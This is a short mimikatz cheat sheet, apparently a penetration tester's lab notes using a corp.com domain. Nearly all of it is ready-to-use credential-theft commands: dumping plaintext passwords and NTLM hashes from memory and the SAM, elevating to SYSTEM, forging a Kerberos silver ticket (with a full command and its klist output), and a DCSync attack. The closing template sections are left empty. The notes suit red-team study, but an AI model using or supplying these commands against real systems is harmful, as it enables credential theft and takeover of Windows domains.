mimikatz

Pre-made commands

Run the program

./mimikatz

Run individual/strung together commands for when interactive shell doesn’t work. string together as many commands as you want, just end with exit.

mimikatz log version "privilege::debug" exit

Enable SeDebugPrivelege

privilege::debug

Elevate to SYSTEM user privileges

token::elevate

Attempt to extract plaintext passwords and hashes from all sources

sekurlsa::logonpasswords

Extract NTLM hashes from the SAM (Get sys user privs first)

lsadump::sam

Create a silver ticket.

# We need to provide the domain SID (/sid:), domain name (/domain:), and the target where the SPN runs (/target:). We also need to include the SPN protocol (/service:), NTLM hash of the SPN (/rc4:), and the /ptt option, which allows us to inject the forged ticket into the memory of the machine we execute the command on.
# Finally, we must enter an existing domain user for /user:. This user will be set in the forged ticket.
 
kerberos::golden /sid:S-1-5-21-1987370270-658905905-1781884369 /domain:corp.com /ptt /target:web04.corp.com /service:http /rc4:4d28cf5252d39971419580a51484ca09 /user:jeffadmin

Run this command to verify the silver ticket is submitted to current session

klist
 
# Output of the above silver ticket is:
 
Current LogonId is 0:0xa04cc
 
Cached Tickets: (1)
 
#0>     Client: jeffadmin @ corp.com
        Server: http/web04.corp.com @ corp.com
        KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
        Ticket Flags 0x40a00000 -> forwardable renewable pre_authent
        Start Time: 9/14/2022 4:37:32 (local)
        End Time:   9/11/2032 4:37:32 (local)
        Renew Time: 9/11/2032 4:37:32 (local)
        Session Key Type: RSADSI RC4-HMAC(NT)
        Cache Flags: 0
        Kdc Called:

Perform a dsync attack to obtain credentials in mimikatz

lsadump::dcsync /user:corp\dave

---

Flags

Flag	Description
-x	What does it do

---

Useful Scripts

Useful bash script

#!/bin/bash